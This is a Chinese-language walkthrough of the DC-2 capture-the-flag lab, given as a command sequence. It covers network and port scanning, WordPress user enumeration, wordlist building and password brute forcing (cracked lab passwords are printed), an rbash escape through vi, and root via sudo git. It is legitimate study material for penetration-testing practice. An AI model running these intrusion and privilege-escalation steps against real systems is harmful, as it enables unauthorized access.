1.信息收集

扫描存活主机

sudo arp-scan -l

扫描主机开放端口

nmap -p- 192.168.42.155

扫描主机开放端口的具体服务

nmap -p 80,7744 -sV -A 192.168.42.155

80端口是网页,7744是SSH

日常扫描指纹

whatweb 192.168.42.155

2.漏洞挖掘

访问网站,发现无法访问,猜测为hosts问题

改写host文件

vim /etc/hosts

192.168.42.155 dc-2

成功访问,开始逛街

点击flag,得到FLAG1

没东西了,开始扫扫路径

dirb http://dc-2/

发现一个登录框,是wordpass建站模板

先一个默认密码,没成功,再想想办法

找到一个专门找wp账号的工具

wpscan --url dc-2 -e u

找到三个用户,admin,jerry,tom

既然有账号,就有想办法得到密码,上cewl工具,

cwel http://dc-2 -w dict.txt

有了账号密码,开始爆破

爆破成功

tom

parturient

jerry

adipiscing

3.漏洞利用

登录两个账号看看

在jerry账号中page找到FLAG2

根据FLAG2的内容,我们尝试ssh登录

ssh服务在7744

ssh tom@192.168.42.155 -p 7744

cat 发现报错(-rbash

rbash,即受限制的 bash,其可以用作中转服务器(实际上rbash只是bash的一软链接)。它与一般shell的区别在于会限制一些行为,让一些命令无法执行。

于是查找可用命令

echo $PATH

echo /home/tom/usr/bin/*

只有less,ls,scp,vi

命令太少,尝试rbash逃逸

export

显示环境变量

输入以下命令

vi shell

:set shell=/bin/sh
:shell

$ export PATH=$PATH:/bin/
$ export PATH=$PATH:/usr/bin/

逃逸成功,查看flag3.txt

理解内容,他让su用户

.

4.提升权限

找一下新的FLAG4

find / -name *flag*

还有FLAG,开始提权

常规命令

find / -perm -u=s -type f 2>/dev/null

发现没什么特殊的,换命令

发现git命令

sudo -l

不会用,有网站

查一下git

找一条你喜欢的命令

sudo git -p help config

!/bin/sh

提权成功,拿到全部FLAG

cat /root/final-flag.txt